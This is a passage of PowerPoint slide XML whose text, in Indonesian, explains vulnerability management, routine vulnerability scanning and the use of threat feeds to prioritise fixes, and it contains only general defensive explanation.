              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rutin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gambaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>agregat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, vendor, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> global, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendeteksiannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanskap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>landasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aspek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistematis</a:t>
            </a:r>
